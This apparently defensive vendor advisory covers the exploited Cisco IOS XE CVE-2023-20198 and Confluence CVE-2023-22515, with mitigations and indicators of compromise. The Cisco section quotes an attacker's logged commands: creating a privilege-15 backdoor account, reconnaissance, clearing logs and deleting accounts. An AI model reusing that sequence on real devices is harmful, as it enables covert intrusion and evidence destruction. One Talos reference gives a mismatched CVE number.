Cisco’s public advisory on CVE-2023-20198 merely says that Cisco IOS XE software is vulnerable if the web UI feature is enabled (the UI is enabled through the ip http server or ip http secure-server commands). Cisco does not offer a list of products that definitively run IOS XE, but their product page for IOS XE lists some, including the Catalyst, ASR, and NCS families.

According to the advisory, customers can determine whether the HTTP Server feature is enabled for a system, by logging into the system and using the show running-config | include ip http server|secure|active command in the CLI to check for the presence of the ip http server command or the ip http secure-server command in the global configuration. The presence of either command or both commands in the system configuration indicates that the web UI feature is enabled (and that the system is therefore vulnerable).

Cisco’s advisory also specifies that if the ip http server command is present and the configuration also contains ip http active-session-modules none, the vulnerability is not exploitable over HTTP. If the ip http secure-server command is present and the configuration also contains ip http secure-active-session-modules none, the vulnerability is not exploitable over HTTPS.

Mitigation guidance

In lieu of a patch, organizations should disable the web UI (HTTP Server) component on internet-facing systems on an emergency basis. To disable the HTTP Server feature, use the no ip http server or no ip http secure-server command in global configuration mode. Per Cisco’s advisory, if both the HTTP server and HTTPS server are in use, both commands are required to disable the HTTP Server feature. Organizations should also avoid exposing the web UI and management services to the internet or to untrusted networks.

Disabling the web UI component of IOS XE systems and limiting internet exposure reduces risk from known attack vectors, but notably does not mitigate risk from implants that may have already been successfully deployed on vulnerable systems. Rapid7 recommends invoking incident response procedures where possible to prioritize hunting for indicators of compromise Cisco has shared, listed below.

Cisco-observed attacker behavior

The Cisco Talos blog on CVE-2023-21098 has a full analysis of the implant they’ve observed being deployed as part of this threat campaign. We strongly recommend reading the analysis in its entirety. The implant is saved under the file path /usr/binos/conf/nginx-conf/cisco_service.conf that contains two variable strings made up of hexadecimal characters. While the implant is not persistent (a device reboot will remove it), the attacker-created local user accounts are.

Cisco observed the threat actor exploiting CVE-2021-1435, which was patched in 2021, to install the implant after gaining access to a device vulnerable to CVE-2023-20198. Talos also notes that they have seen devices fully patched against CVE-2021-1435 getting the implant successfully installed “through an as of yet undetermined mechanism.”

Rapid7-observed attacker behavior

Rapid7 MDR has so far identified a small number of instances where CVE-2023-20198 was exploited in customer environments, including multiple instances of exploitation within the same customer environment on the same day. The indicators of compromise our team has identified with available evidence indicate the use of techniques similar to those described by Cisco Talos.

Rapid7 identified variations of techniques in the course of our investigations. The first malicious activity performed on the system post-exploitation was associated with the admin account. The following is an excerpt from this log file:
%SYS-5-CONFIG_P: Configured programmatically by process SEP_webui_wsma_http from console as admin on vty1
The threat actor created the local account cisco_support using the command username cisco_support privilege 15 algorithm-type sha256 secret * under user context admin. The threat actor then authenticated to the system using this newly created cisco_support account and began running several commands, including the following:

show running-config
show voice register global
show dial-peer voice summary
show platform
show flow monitor
show platform
show platform software iox-service
show iox-service
dir bootflash:
dir flash:
clear logging
no username cisco_support
no username cisco_tac_admin
no username cisco_sys_manager

Upon completion of these commands, the threat actor deleted the account cisco_support. The accounts cisco_tac_admin and cisco_sys_manager were also deleted, but Rapid7 did not observe account creation commands associated with these accounts within available logs.

The threat actor also executed the clear logging command to clear system logging and cover their tracks. Rapid7 identified logging for the second exploitation on October 12, 2023, but could not review logs for the first intrusion because the logs had been cleared.

Evidence indicated that the last action performed by the threat actor relates to a file named aaa:
%WEBUI-6-INSTALL_OPERATION_INFO: User: cisco_support, Install Operation: ADD aaa

When comparing the two intrusions that occurred within the same environment on October 12, there are slight differences in observed techniques. For example, log clearing was only performed within the first exploitation, while the second exploitation included additional directory viewing commands.

Indicators of compromise

The Cisco Talos blog on CVE-2023-20198 directs organizations to look for unexplained or newly created users on devices running IOS XE. One way of identifying whether the implant observed by Talos is present is to run the following command against the device, where the "DEVICEIP” portion is a placeholder for the IP address of the device to check:

curl -k -X POST "https[:]//DEVICEIP/webui/logoutconfirm.html?logon_hash=1"

The command above will execute a request to the device’s Web UI to see if the implant is present. If the request returns a hexadecimal string, the implant is present (note that the web server must have been restarted by the attacker after the implant was deployed for the implant to have become active). Per Cisco’s blog, the above check should use the HTTP scheme if the device is only configured for an insecure web interface.

Additional Cisco IOCs

• 5.149.249[.]74
• 154.53.56[.]231

Usernames:

• cisco_tac_admin
• cisco_support

Cisco Talos also advises performing the following checks to determine whether a device may have been compromised:

Check the system logs for the presence of any of the following log messages where “user” could be cisco_tac_admin, cisco_support or any configured, local user that is unknown to the network administrator:

• %SYS-5-CONFIG_P: Configured programmatically by process SEP_webui_wsma_http from console as user on line

• %SEC_LOGIN-5-WEBLOGIN_SUCCESS: Login Success [user: user] [Source: source_IP_address] at 03:42:13 UTC Wed Oct 11 2023

Note: The %SYS-5-CONFIG_P message will be present for each instance that a user has accessed the web UI. The indicator to look for is new or unknown usernames present in the message.

Organizations should also check the system logs for the following message where filename is an unknown filename that does not correlate with an expected file installation action:

• %WEBUI-6-INSTALL_OPERATION_INFO: User: username, Install Operation: ADD filename

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to CVE-2023-20198 with an authenticated vulnerability check that looks for Cisco IOS XE devices with the web UI enabled. The check is available in today’s (October 17) content release.

InsightIDR and Rapid7 MDR customers have existing detection coverage through Rapid7's expansive library of detection rules. The following detection rules are deployed and alerting on activity related to this vulnerability via the IP addresses provided by Cisco:

• Network Flow - CURRENT_EVENTS Related IP Observed
• Suspicious Connection - CURRENT_EVENTS Related IP Observed

Updates

October 17, 2023: Updated with Rapid7-observed attacker behavior and IOCs.

On October 4, 2023, Atlassian published a security advisory on CVE-2023-22515, a critical privilege escalation vulnerability affecting on-premises instances of Confluence Server and Confluence Data Center. Atlassian does not specify the root cause of the vulnerability or where exactly the flaw resides in Confluence implementations, though the indicators of compromise include mention of the /setup/* endpoints.

The advisory indicates that “Atlassian has been made aware of an issue reported by a handful of customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence Data Center and Server instances to create unauthorized Confluence administrator accounts and access Confluence instances.”

It’s unusual, though not unprecedented, for a privilege escalation vulnerability to carry a critical severity rating. Atlassian’s advisory implies that the vulnerability is remotely exploitable, which is typically more consistent with an authentication bypass or remote code execution chain than a privilege escalation issue by itself. It’s possible that the vulnerability could allow a regular user account to elevate to admin — notably, Confluence allows for new user sign-ups with no approval, but this feature is disabled by default.

Since CVE-2023-22515 has been exploited in user environments, Atlassian recommends that on-premises Confluence Server and Data Center customers update to a fixed version immediately, or else implement mitigations. The advisory notes that “Instances on the public internet are particularly at risk, as this vulnerability is exploitable anonymously.” Indicators of compromise are included in the advisory and are reproduced in the Mitigation guidance section below.

Affected Products

The following versions of Confluence Server and Data Center are affected:

• 8.0.0
• 8.0.1
• 8.0.2
• 8.0.3
• 8.0.4
• 8.1.0
• 8.1.1
• 8.1.3
• 8.1.4
• 8.2.0
• 8.2.1
• 8.2.2
• 8.2.3
• 8.3.0
• 8.3.1
• 8.3.2
• 8.4.0
• 8.4.1
• 8.4.2
• 8.5.0
• 8.5.1
  

Versions prior to 8.0.0 are not affected by this vulnerability. Atlassian Cloud sites are not affected by this vulnerability. Confluence sites accessed via an atlassian.net domain are hosted by Atlassian and are not vulnerable to this issue.

Fixed versions:

• 8.3.3 or later
• 8.4.3 or later
• 8.5.2 (Long Term Support release) or later
  

For more information, refer to the Atlassian advisory and release notes.

Mitigation guidance

On-prem Confluence Server and Confluence Data Center customers should upgrade to a fixed version immediately, restricting external network access to vulnerable systems until they are able to do so. The Atlassian advisory says that known attack vectors can be mitigated by blocking access to the /setup/* endpoints on Confluence instances. Directions on doing this are in the advisory.

Atlassian recommends checking all affected Confluence instances for the following indicators of compromise:

• Unexpected members of the confluence-administrator group
• Unexpected newly created user accounts
• Requests to /setup/*.action in network access logs
• Presence of /setup/setupadministrator.action in an exception message in atlassian-confluence-security.log in the Confluence home directory
  

Rapid7 customers

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2023-22515 with a remote version-based vulnerability check expected to be available in today’s (October 4) content release.